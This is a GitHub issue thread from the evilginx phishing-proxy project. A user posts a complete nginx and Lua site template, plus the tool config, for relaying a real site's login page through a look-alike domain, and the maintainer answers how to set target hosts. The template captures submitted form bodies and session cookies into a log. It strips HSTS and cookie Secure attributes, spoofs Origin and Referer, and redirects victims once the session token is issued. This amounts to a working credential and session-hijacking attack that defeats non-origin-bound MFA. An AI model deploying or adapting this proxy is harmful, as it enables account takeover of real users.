kgretzky / evilginx

PLEASE USE NEW VERSION: https://github.com/kgretzky/evilginx2
MIT License

js and css files showing as html #17

Closed dissidentmoore closed 7 years ago

dissidentmoore commented 7 years ago

First I'll say, great job on this, everything worked out of the box with basically no snags, very cool.
However, I'm having a lot of trouble getting things working for a custom target. The target page is served when I visit the phishing domain, as it should be, but the CSS and JS files are not: the same login page is served in place of each JS or CSS file. Here are my config and site.conf files:

config


[site]
name=site
site_conf=["site.com.conf"]
creds_conf=site.creds
phish_subdomains=["www1"]
phish_paths=["/blah/blah/login"]
target_hosts=["www1.site.com/cgi-bin/dir/script?PF=IT&REQ=ClientSignin&LANGUAGE=ENGLISH"]
cookie_hosts=["site.com"]
redir_arg=rc
success_arg=rd
log_name=evilginx-site.log
cert_subdomains=["www1"]

site.conf

# Access-log format referenced by the access_log directive in the server
# block. Each request produces one JSON-shaped line with the client address,
# local time, Host header, request line, status, Referer, User-Agent,
# connection serial number, the request Cookie header, the Set-Cookie values
# gathered into $set_cookies_all, and the full request body.
# The cookie and body fields are where submitted form fields and session
# cookies end up, so on a host running this template the log file itself is
# the sensitive artefact to secure and examine during incident response.
# NOTE(review): no escape=json parameter is given, so nginx default escaping
# applies and a line may not parse as strict JSON -- confirm before feeding
# it to a JSON parser.
log_format site_phish '{"remote_addr":"$remote_addr","time":"$time_local","host":"$http_host","request":"$request","status":"$status","referer":"$http_referer","ua":"$http_user_agent","conn":"$connection","cookies":"$http_cookie","set-cookies":"$set_cookies_all","body":"$request_body"}';

# Reverse-proxy virtual host template. The double-brace tokens are
# placeholders, presumably substituted by the tool before nginx loads the
# file. Every request on the look-alike hostname is relayed to the real site;
# cookies, redirects and page links are rewritten on the way back and each
# request is written to the access log in the site_phish format.
# NOTE(review): the real site performs the login itself, so any session
# cookie it issues passes through this host after all authentication steps
# have completed. Authenticators bound to the page origin (WebAuthn/FIDO2)
# are the control that does not carry over to a different hostname.
server {
    listen 80;
    listen 443 ssl;

    server_name {{PHISH_HOSTNAME[0]}};

    ssl_certificate {{CERT_PUBLIC_PATH}};
    ssl_certificate_key {{CERT_PRIVATE_PATH}};

    # TLS 1.0 and 1.1 are accepted in addition to 1.2.
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
    ssl_prefer_server_ciphers on;
    ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';

    # Plain-HTTP requests are answered with a permanent redirect to HTTPS.
    if ($scheme = http) {
        return 301 https://$server_name$request_uri;
    }

    # Single catch-all location: every path is relayed to the upstream host.
    location / {
        proxy_pass https://{{TARGET_HOST[0]}};
        # Rewrite the Domain attribute of upstream Set-Cookie headers so the
        # browser stores those cookies for the proxy domain.
        proxy_cookie_domain {{COOKIE_HOST[0]}} {{PHISH_DOMAIN}};
        proxy_cookie_domain .www1.{{COOKIE_HOST[0]}} .www1.{{PHISH_DOMAIN}};
        # Rewrite upstream Location and Refresh headers to the proxy hostname.
        proxy_redirect https://{{TARGET_HOST[0]}}/ https://{{PHISH_HOSTNAME[0]}}/;

        # Replace the upstream hostname with the proxy hostname in response
        # bodies; sub_filter_once off applies this to every occurrence.
        # NOTE(review): any URL these three patterns do not match is fetched
        # by the browser directly from the real site, presumably with the
        # look-alike hostname in the Referer header -- a signal the real site
        # can alert on.
        sub_filter 'action="https://{{TARGET_HOST[0]}}' 'action="https://{{PHISH_HOSTNAME[0]}}';
        sub_filter 'href="https://{{TARGET_HOST[0]}}' 'href="https://{{PHISH_HOSTNAME[0]}}';
        sub_filter '//{{TARGET_HOST[0]}}' '//{{PHISH_HOSTNAME[0]}}';
        sub_filter_once off;

        # Name of the upstream cookie that the header filter below looks for
        # in Set-Cookie headers (read there as ngx.var.auth_token).
        set $auth_token "tokenid";

        # Empty Accept-Encoding asks the upstream for an uncompressed body,
        # presumably so the sub_filter rules can match the text.
        proxy_set_header Accept-Encoding "";
        # The client address is forwarded to the upstream in these two
        # headers. Seen from the real site, login traffic arrives from the
        # address of this host with forwarding headers that its own
        # infrastructure did not add, which is a detection opportunity.
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

        # $redir holds the URI-unescaped value of the redirect query argument.
        set_unescape_uri $redir $arg_{{REDIR_ARG}};
        # Filled by the header filter below and written out by the log format.
        set $set_cookies_all "";

        access_log /var/log/{{LOG_NAME}} site_phish;

        access_by_lua_block {
            -- Access phase: runs before the request is relayed upstream.
            -- The browser sends Origin and Referer naming the proxy hostname;
            -- both are rewritten to the upstream hostname, so origin and
            -- referer checks on the real site see their own name.
            if ngx.var.http_origin ~= nil then
                val = string.gsub(ngx.var.http_origin, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
                ngx.req.set_header("Origin", val)
            end

            if ngx.var.http_referer ~= nil then
                val = string.gsub(ngx.var.http_referer, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
                ngx.req.set_header("Referer", val)
            end

            -- When the request carries both the redirect cookie and the
            -- success cookie, the request is not relayed: the client is
            -- redirected to the URL stored in the redirect cookie.
            if ngx.var.http_cookie ~= nil then
                local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)")
                local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)")

                if c_rc ~= nil and c_rd ~= nil then
                    ngx.redirect(c_rc)
                end
            end
        }

        header_filter_by_lua_block {
            -- Header-filter phase: runs on the upstream response headers
            -- before they are sent to the browser.

            -- Return the response Set-Cookie values as a table; a single
            -- string value is wrapped, a missing header gives an empty table.
            function get_cookies()
                local cookies = ngx.header.set_cookie or {}
                if type(cookies) == "string" then
                    cookies = {cookies}
                end
                return cookies
            end

            -- Append one Set-Cookie value to the response.
            function add_cookie(cookie)
                local cookies = get_cookies()
                table.insert(cookies, cookie)
                ngx.header.set_cookie = cookies
            end

            -- True when some response Set-Cookie value starts with the given
            -- cookie name followed by an equals sign.
            function exists_cookie(cookie)
                local cookies = get_cookies()
                for i, val in ipairs(cookies) do
                    if string.match(val, "^" .. cookie .. "=") ~= nil then
                        return true
                    end
                end
                return false
            end

            -- Assigning an empty table removes the header, so the upstream
            -- Strict-Transport-Security policy never reaches the browser.
            ngx.header["Strict-Transport-Security"] = {}
            -- The request Origin is echoed back as the allowed CORS origin.
            if ngx.var.http_origin ~= nil then
                ngx.header["Access-Control-Allow-Origin"] = ngx.var.http_origin
            end

            -- A redirect argument on the request is stored in a cookie. A
            -- leading 0 marks the rest of the value as base64, which is
            -- decoded before the value is URI-escaped into the cookie.
            if ngx.var.redir ~= "" then
                local r_url = ngx.var.redir
                if string.sub(r_url,1,1) == '0' then
                    val = string.sub(ngx.var.redir, 2)
                    r_url = ngx.decode_base64(val)
                end
                add_cookie("{{REDIR_ARG}}=" .. ngx.escape_uri(r_url) .. "; path=/")
            end

            -- Empty branch: nothing is done with the Location header here.
            if ngx.header.location then
            end

            -- With a redirect cookie on the request, the response Location is
            -- overwritten with the stored URL once either the upstream sets
            -- the cookie named by $auth_token or the success cookie is already
            -- present; the success cookie is then set. The first condition is
            -- the moment the real site has issued its session cookie.
            if ngx.var.http_cookie ~= nil then
                local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)")
                local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)")

                if c_rc ~= nil then
                    if exists_cookie(ngx.var.auth_token) or c_rd ~= nil then
                        ngx.header.location = ngx.unescape_uri(c_rc)
                        add_cookie("{{SUCCESS_ARG}}=true; path=/")
                    end
                end
            end

            -- Every Set-Cookie value loses its Max-Age, Expires and Secure
            -- attributes before reaching the browser. The scrubbed values are
            -- also joined with a double-pipe separator into $set_cookies_all,
            -- which the access log records alongside the request.
            if ngx.header.set_cookie then
                local cookies = ngx.header.set_cookie
                if not cookies then return end
                if type(cookies) ~= "table" then cookies = {cookies} end
                local newcookies = {}
                local allcookies = ""
                for i, val in ipairs(cookies) do
                    val = string.gsub(val, '; *[mM]ax%-[aA]ge=[^;]*', "")
                    val = string.gsub(val, '; *[eE]xpires=[^;]*', "")
                    val = string.gsub(val, '; *[sS]ecure', "")
                    table.insert(newcookies, val)
                    if i>1 then allcookies = allcookies .. "||" end
                    allcookies = allcookies .. val
                end
                ngx.header.set_cookie = newcookies
                ngx.var.set_cookies_all = allcookies
            end
        }
    }
}

Also (this is unrelated): in the .conf files for each site, you have `sub_filter_types text/html application/json;` set unnecessarily, since text/html is already set by default. This causes a `[warn] duplicate MIME type "text/html" in /etc/nginx/sites-enabled/site.com.conf` warning every time the page is requested. Everything still works, but the error.log fills up pretty quickly.

dissidentmoore commented 7 years ago

Hmm, so i think my problem is that the target host has a request uri. Everything seems to work fine if the request uri is omitted. Is there any way to include the request uri, but only for the login page, and not for additional resources like js/css and images?

kgretzky commented 7 years ago

Hello! target_hosts must contain hostnames only. I'm not sure exactly how your site works, but if you properly proxy your site with Evilginx, you should be able to specify anything you want in URL path, using your fake domain.

And thanks for letting me know why these warnings are generated! I will fix it ASAP.